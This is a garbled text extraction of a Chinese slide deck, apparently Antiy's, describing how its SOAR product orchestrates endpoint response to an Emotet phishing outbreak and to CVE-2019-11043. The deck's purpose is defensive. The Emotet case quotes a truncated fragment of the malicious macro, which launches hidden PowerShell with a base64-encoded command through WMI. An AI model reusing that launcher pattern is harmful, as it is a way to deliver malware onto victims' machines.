SOAR如何編排指引細(xì)粒度的端點(diǎn)處置_第1頁(yè)
SOAR如何編排指引細(xì)粒度的端點(diǎn)處置_第2頁(yè)
SOAR如何編排指引細(xì)粒度的端點(diǎn)處置_第3頁(yè)
SOAR如何編排指引細(xì)粒度的端點(diǎn)處置_第4頁(yè)
SOAR如何編排指引細(xì)粒度的端點(diǎn)處置_第5頁(yè)
已閱讀5頁(yè),還剩47頁(yè)未讀 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

SOAR如何編排指引細(xì)粒度的端點(diǎn)處置威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗CONTENTS01面臨的挑戰(zhàn)02什么是SOAR03安天SOAR案例04安天SOAR架構(gòu)05安天SOAR特點(diǎn)威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗面臨的挑戰(zhàn)面臨的挑戰(zhàn)Page4威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗什么是SOAR什么是SOAR(通過(guò)與其它技術(shù)的集成)并自動(dòng)執(zhí)行以達(dá)成預(yù)期結(jié)果,譬如分診管理,事件響應(yīng),威脅情報(bào),合規(guī)性管理和威脅獵捕。SOARaresolutionsthataddmachineassistancetohumansecurityoperatorsbytakinginputsfromtechnologies)andautomatedtoachieveadesiredoutcome,suchastriagemanagement,incidentresponders,threatintelligence,compliancemanagers,andthreathunting.來(lái)源:Page6威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗Page7安天對(duì)SOAR的認(rèn)知威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗安天SOAR案例1324案例一內(nèi)網(wǎng)Emotet傳播事件:攻擊過(guò)程還原1324應(yīng)急響應(yīng)人員排查后發(fā)現(xiàn)這是一起利用COVID-19為誘餌分發(fā)釣魚(yú)郵件傳播Emotet惡意代碼的安全DoWhileGetObject(winmgmtS:win32_Procreate("Powershell-whidden-enJABBAHAGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaMAZgBwAHMAbQA9ACcAUgBeQB2AGUAJwA7ACQARQBrAHgAaABsAA來(lái)源《利用疫情傳播Emotet銀行木馬攻擊事件梳理Page9威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗案例一內(nèi)網(wǎng)Emotet傳播事件:態(tài)勢(shì)感知系統(tǒng)威脅告警Page10威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗案例一內(nèi)網(wǎng)Emotet傳播事件:系統(tǒng)自動(dòng)分析基于ATT&CK框架融合分析Page11威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗案例一內(nèi)網(wǎng)Emotet傳播事件:處置流程的精細(xì)化編排Page12威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗I案例一內(nèi)網(wǎng)Emotet傳播事件:處置流程的精細(xì)化編排Page13威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗Page14威脅框架:細(xì)粒度對(duì)抗案例一內(nèi)網(wǎng)Emotet傳播事件:處置腳本編輯器(4)、腳本(5)、其他(5+)等共25+種操作原語(yǔ)Page15安天ARR(AntiyResponseRule)開(kāi)放式處置規(guī)則定義ARRARR(AntiyResponseRule)的部分指令集1.創(chuàng)建注冊(cè)表項(xiàng)/值[Reg_Create] 2.修改注冊(cè)表項(xiàng)/值[Reg_Modify] 3.刪除注冊(cè)表項(xiàng)/值[Reg_Delete] 4.重命名注冊(cè)表項(xiàng)/值[Reg_Rename]5.刪除注冊(cè)表值[Reg_Delete_Value]1.創(chuàng)建計(jì)劃任務(wù)[Task_Create]2.修改計(jì)劃任務(wù)[Task_Modify]3.刪除計(jì)劃任務(wù)[Task_Delete]1.創(chuàng)建文件[File_Create]2.修改文件[File_Modify]3.刪除文件[File_Delete]4.重命名文件[File_Rename]5.修改文件屬性[File_Attribute]6.刪除文件指定內(nèi)容[File_DelText]7.MBR修復(fù)[File_repairMbr]1.創(chuàng)建進(jìn)程[Proc_Create] 2.掛起/恢復(fù)進(jìn)程[Proc_Modify] 3.結(jié)束進(jìn)程[Proc_Terminate]4.掛起指定模塊線程[Proc_Module_Threads]1.下發(fā)bat腳本并運(yùn)行[Script_Bat]2.下發(fā)shell腳本并運(yùn)行[Script_Shell]3.下發(fā)vbs腳本并運(yùn)行[Script_Vbs]4.下發(fā)powershell腳本并運(yùn)行[Script_PWL]5.下載文件并運(yùn)行[Script_File]1.外設(shè)彈出/規(guī)則[Other_Device]2.斷網(wǎng)處置[Other_NetOff]3.禁用端口[Other_Disabled_Port]3.禁用ip[Other_Disabled_Ip]4.補(bǔ)丁修復(fù)[Other_Fix_patch]5.創(chuàng)建互斥免疫[Other_Create_Mutex]6.創(chuàng)建掃描并自動(dòng)處置[Other_QuickScan]二、計(jì)劃任務(wù)(可配自動(dòng)處置規(guī)則)一、注冊(cè)表(可配自動(dòng)處置規(guī)則)三、文件(可配自動(dòng)處置規(guī)則)四、進(jìn)程(可配自動(dòng)處置規(guī)則)五、腳本六、其他安天ARR開(kāi)放式處置規(guī)則定義是安天為實(shí)現(xiàn)細(xì)粒度端點(diǎn)響應(yīng)策略而定義的一組指令集合,包括了對(duì)扇區(qū)、注冊(cè)表、文件、驅(qū)動(dòng)、進(jìn)程等進(jìn)行相關(guān)操作的動(dòng)作定義,并可以執(zhí)行包括磁盤遍歷,特征匹配搜索等邏輯動(dòng)作??梢杂糜谔幚聿呗跃幣?、專殺腳本生成,以執(zhí)行細(xì)粒度的處置動(dòng)作。安天SOAR提供ARR編輯器,并可以在部分場(chǎng)景中自動(dòng)生成處置腳本供網(wǎng)管審核。ARR處置規(guī)則支持判定條件,用于觸發(fā)相應(yīng)處置:案例一內(nèi)網(wǎng)Emotet傳播事件:生成處置包置包派發(fā)至相關(guān)設(shè)備,并將操作記錄留存Page16威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗案例二CVE-2019-11043漏洞告警Page17威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗案例二CVE-2019-11043漏洞處置?根據(jù)資產(chǎn)所屬業(yè)務(wù)屬性選擇緩解措施緩解腳本?修改Nginx配置文件增加SecRuleREQUEST_URI\?重載NginxPage18威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗安天SOAR架構(gòu)Page20SOAR功能架構(gòu)終端探針流量探針網(wǎng)絡(luò)設(shè)備安全設(shè)備資產(chǎn)運(yùn)維其他系統(tǒng)威脅情報(bào)上下文識(shí)別實(shí)體關(guān)聯(lián)事件歸類分析工具案件報(bào)告流程處理關(guān)聯(lián)分析劇本應(yīng)用線索管理效能評(píng)估AVLPK專殺統(tǒng)數(shù)據(jù)平臺(tái)場(chǎng)景劇本匹配劇本管理劇本驗(yàn)證劇本審核加密簽名版本管理劇本庫(kù)驗(yàn)證系統(tǒng)自動(dòng)響應(yīng)核對(duì)資源管理指令集管理控制臺(tái)簽名驗(yàn)證指令下發(fā)威脅情報(bào)上下文識(shí)別實(shí)體關(guān)聯(lián)事件歸類分析工具案件報(bào)告流程處理關(guān)聯(lián)分析劇本應(yīng)用線索管理效能評(píng)估AVLPK專殺統(tǒng)數(shù)據(jù)平臺(tái)場(chǎng)景劇本匹配劇本管理劇本驗(yàn)證劇本審核加密簽名版本管理劇本庫(kù)驗(yàn)證系統(tǒng)自動(dòng)響應(yīng)核對(duì)資源管理指令集管理控制臺(tái)簽名驗(yàn)證指令下發(fā)指令編輯指令編輯可視化編排腳本編譯Page21 威脅情報(bào) 態(tài)勢(shì)感知 SOAR部署結(jié)構(gòu) 威脅情報(bào) 態(tài)勢(shì)感知 威脅框架:細(xì)粒度對(duì)抗威脅框架:細(xì)粒度對(duì)抗安天SOAR特點(diǎn)安全運(yùn)營(yíng)能力特點(diǎn)安天SOAR的能力安全運(yùn)營(yíng)能力特點(diǎn)安全能力編排化效能可評(píng)估效果可驗(yàn)證腳本編輯可視化關(guān)聯(lián)分析流程化響應(yīng)處置自動(dòng)化Page24安天SOAR的價(jià)值統(tǒng)籌與協(xié)調(diào)智能化關(guān)聯(lián)智能化分析威脅行為體活動(dòng)的上下文信息關(guān)聯(lián)匯總相似、相關(guān)事件統(tǒng)籌

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論